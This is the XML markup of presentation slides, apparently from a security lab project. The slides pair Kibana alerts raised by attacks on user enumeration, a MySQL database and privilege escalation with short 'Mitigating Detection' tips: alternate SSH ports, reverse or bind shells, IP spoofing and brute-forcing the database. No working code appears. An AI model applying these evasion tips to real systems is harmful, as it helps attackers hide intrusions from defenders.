            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7346525" y="5701200"/>
            <a:ext cx="9684600" cy="2313600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB0000"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="540303"/>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
            <a:tileRect/>
          </a:gradFill>
          <a:effectLst>
            <a:outerShdw blurRad="71438" dist="171450" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8044" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Avoiding Detection</a:t>
            </a:r>
            <a:endParaRPr sz="11000" b="1">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6200">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealth Exploitation of User Enumeration and Weak Password</a:t>
            </a:r>
            <a:endParaRPr sz="6200" b="1">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;26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16</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="268" name="Google Shape;268;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9183937" y="7934401"/>
            <a:ext cx="6009778" cy="5006000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="285750" dist="85725" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="269" name="Google Shape;269;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536549" y="7934412"/>
            <a:ext cx="5379900" cy="5006000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="285750" dist="85725" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="270" name="Google Shape;270;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17632775" y="7959975"/>
            <a:ext cx="4934315" cy="4954874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="285750" dist="85725" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Google Shape;271;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="845050" y="2528925"/>
            <a:ext cx="12480900" cy="4954800"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="257175" dist="95250" dir="216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5000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Kibana was able to detect the following alerts:</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Excessive http errors that has exceeded the threshold  </a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Increase in CPU usage that has exceeded the threshold </a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>HTTP request size monitor that has exceeded the threshold</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;272;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="14480600" y="2528926"/>
            <a:ext cx="9165600" cy="4954800"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AFCA54"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="257175" dist="95250" dir="216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4900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr sz="4900" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-476250" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3900"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>SSH through an alternative open ports that is less detectable </a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-476250" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3900"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Alternative exploit: reverse or bind shell exploit to connect to target.</a:t>
            </a:r>
            <a:endParaRPr sz="3900">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2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27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68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26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69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26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70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealth Exploitation of MySQL Database </a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;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17</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="279" name="Google Shape;279;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10529125" y="3301136"/>
            <a:ext cx="13094700" cy="8478824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="214313" dist="85725" dir="1920000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Google Shape;280;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="845050" y="2528925"/>
            <a:ext cx="9165600" cy="4361700"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="257175" dist="95250" dir="216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5000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-495300" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Alert identified source ip of attacking machine 192.168.1.90 </a:t>
            </a:r>
            <a:endParaRPr sz="4200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-495300" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Detected unauthorized attempts to access the database </a:t>
            </a:r>
            <a:endParaRPr sz="4200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Google Shape;281;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="845050" y="7898850"/>
            <a:ext cx="9165600" cy="4517100"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AFCA54"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="257175" dist="95250" dir="216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5000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr sz="5000" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-495300" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Use IP spoofing techniques to avoid detection of attacking IP.</a:t>
            </a:r>
            <a:endParaRPr sz="4200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-495300" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Brute-force sql database with password cracking tools</a:t>
            </a:r>
            <a:endParaRPr sz="4200">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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="281"/>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79"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15"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5"/>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealth Exploitation of Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;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18</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1514475" y="2528925"/>
            <a:ext cx="10372800" cy="5629200"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="257175" dist="95250" dir="216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5000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Privilege Escalation alert was used to monitor the attempts of users trying to access as a root user.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="12575300" y="2528925"/>
            <a:ext cx="10372800" cy="5629200"/>
          </a:xfrm>
